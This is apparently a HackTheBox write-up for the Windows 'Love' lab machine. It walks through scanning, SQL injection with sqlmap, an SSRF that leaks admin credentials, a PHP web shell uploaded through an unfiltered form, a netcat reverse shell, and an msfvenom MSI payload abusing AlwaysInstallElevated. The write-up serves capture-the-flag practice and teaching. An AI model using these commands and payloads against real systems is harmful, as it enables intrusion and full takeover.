Love Writeup - HackTheBox

Welcome to the writeup of Love box from HackTheBox. That is a Windows machine where we will explore an SSRF failure abuse of some registers to privilege escaletion.

Pedro Mariano

3 min

Welcome to the writeup of Love box from HackTheBox. This is a easy Windows machine where we will explore an SSRF failure and abuse of some registers to privilege escalation.

I hope you enjoy it!

NMAP

nmap -v -sSV -p 80,135,139,443,445,3306,5000,5040,5985,5986,7680,47001,49664,49665,49666,49667,49668,49669,49670 -Pn 10.10.10.239 -T4 -oA nmap/sSV

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql?
5000/tcp  open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
5040/tcp  open  unknown
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
5986/tcp  open  ssl/http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
7680/tcp  open  pando-pub?
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Added 10.10.10.239 -> love.htb to /etc/hosts.

Web request on port 443 (love.htb:443) returns bad request (code 400), but shows server infos:

Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Server at www.example.com Port 443

GOBUSTER

gobuster dir -u http://love.htb/ -w /usr/share/wordlists/dirb/big.txt -e -s "200,301,302,401" -t 50
===============================================================
http://love.htb/.htaccess            (Status: 403) [Size: 298]
http://love.htb/.htpasswd            (Status: 403) [Size: 298]
http://love.htb/ADMIN                (Status: 301) [Size: 329] [--> http://love.htb/ADMIN/]
http://love.htb/Admin                (Status: 301) [Size: 329] [--> http://love.htb/Admin/]
http://love.htb/Images               (Status: 301) [Size: 330] [--> http://love.htb/Images/]
http://love.htb/admin                (Status: 301) [Size: 329] [--> http://love.htb/admin/] 
http://love.htb/aux                  (Status: 403) [Size: 298]                              
http://love.htb/cgi-bin/             (Status: 403) [Size: 298]                              
http://love.htb/com1                 (Status: 403) [Size: 298]                              
http://love.htb/com2                 (Status: 403) [Size: 298]                              
http://love.htb/com4                 (Status: 403) [Size: 298]                              
http://love.htb/com3                 (Status: 403) [Size: 298]                              
http://love.htb/con                  (Status: 403) [Size: 298]                              
http://love.htb/dist                 (Status: 301) [Size: 328] [--> http://love.htb/dist/]  
http://love.htb/examples             (Status: 503) [Size: 398]                              
http://love.htb/images               (Status: 301) [Size: 330] [--> http://love.htb/images/]
http://love.htb/includes             (Status: 301) [Size: 332] [--> http://love.htb/includes/]
http://love.htb/licenses             (Status: 403) [Size: 417]                                
http://love.htb/lpt2                 (Status: 403) [Size: 298]                                
http://love.htb/lpt1                 (Status: 403) [Size: 298]                                
http://love.htb/nul                  (Status: 403) [Size: 298]                                
http://love.htb/phpmyadmin           (Status: 403) [Size: 298]                                
http://love.htb/plugins              (Status: 301) [Size: 331] [--> http://love.htb/plugins/] 
http://love.htb/prn                  (Status: 403) [Size: 298]                                
http://love.htb/secci�               (Status: 403) [Size: 298]                                
http://love.htb/server-info          (Status: 403) [Size: 417]                                
http://love.htb/server-status        (Status: 403) [Size: 417]                                
http://love.htb/tcpdf                (Status: 301) [Size: 329] [--> http://love.htb/tcpdf/]   
http://love.htb/webalizer            (Status: 403) [Size: 298]

Performing a search according to the application, I could find a public exploit and using burp to get the request and pass it to sqlmap, was confirmed and possible to explore the vulnerabilit.

- Burp request was saved as "love".

sqlmap --dbms=mysql --batch --level=1 --risk=3 -r love -p voter

Working on it, I was able to drop a lot of stuffs...

But I didn't get anything else on this way... Did I miss something? Yes!

So let's go back to the enumeration and perform a new and more "aggressive" scan with NMAP.

NMAP #2

nmap -v -sC -A -p 80,135,139,443,445,3306,5000,5040,5985,5986,7680,47001,49664,49665,49666,49667,49668,49669,49670 -Pn -T4 -oA nmap/sCA 10.10.10.239
Nmap scan report for love.htb (10.10.10.239)
Host is up (0.11s latency).

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=**staging**.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Issuer: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-01-18T14:00:16
| Not valid after:  2022-01-18T14:00:16
| MD5:   bff0 1add 5048 afc8 b3cf 7140 6e68 5ff6
|_SHA-1: 83ed 29c4 70f6 4036 a6f4 2d4d 4cf6 18a2 e9e4 96c2
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp   open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql?
| fingerprint-strings: 
|   NULL: 
|_    Host '10.10.14.73' is not allowed to connect to this MariaDB server
5000/tcp  open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden

[...]

Carefully checking the scan results from port 443 show a possible subdmain: "staging". Added it in DNS to /etc/hosts to.

Tried to access http://staging.love.htb/ and it is active.

That seems to be a service that analyse files/URLs, enabling the identification of malicious content.

The "Demon" (http://staging.love.htb/beta.php) page is possible to scan files, but seems to be vulnerable to SSRF. Was possible to scan an existing file on my machine, hnm...

Tried to access some pages from his host (http://10.10.10.239:80) and worked!

Tried http://127.0.0.1:80 and it give me the same page as the last request...

Checking the ports that runs HTTP we will find the port 5000 that was forbidden when trying to visit it. But what happens if the own server access it?

Visiting HTTP port 5000 as the own server returns a different page which contains admin credentials.

This information let me login at admin painel.

In Manage > Votters and when creating a "new user" is possible to upload an image, but that has no filters on the upload field and it let me get an RCE (Remote Code Execution). Created "napo.php" file containing a system payload and uploaded it to the server.

echo '<?php system($_GET["nap0"]); ?>' > napo.php

Uploaded the executable nc.exe to obtain a reverse shell on port 8888 and through the RCE I could use it to establish the reverse shell - http://love.htb/Images/napo.php?nap0=nc%2010.10.14.88%208888%20-e%20cmd.exe.

With Phoebe user was possible to find the first flag in C:\Users\Phoebe\Desktop\user.txt.

Privilege Escalation

Looking for a way to escalate the privilege, winPEASx64.exe was sent to the host (used impacket-smbserver) and executed it to identify a way to "evolve" our privilege.

Executing WinPEAS we have found a point to abuse privilege escalation.

The problem exist because the 2 registers are enabled (value 1) which means that users of any privilege can install .msi files as NT AUTHORITY\SYSTEM.

Generated a reverse shell with MSFVenom as .msi extension to connect on port 8080 and utilized impacket-smbserver tool again to transfer the .msi file.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.164 LPORT=8080 -f msi -o rnap0.msi

After transfer it I could execute the payload file using msiexec and it returns a reverse shell as SYSTEM.

msiexec /quiet /qn /i rnap0.msi

Now with this privileges we get the control of the box and was possible to find the root flag.

Thanks for reading and feel free to pingback a coffee ;D

naP0

Deixe seu Pingback

References:

https://ed4m4s.blog/privilege-escalation/windows/always-install-elevated

Learn

Support

More Options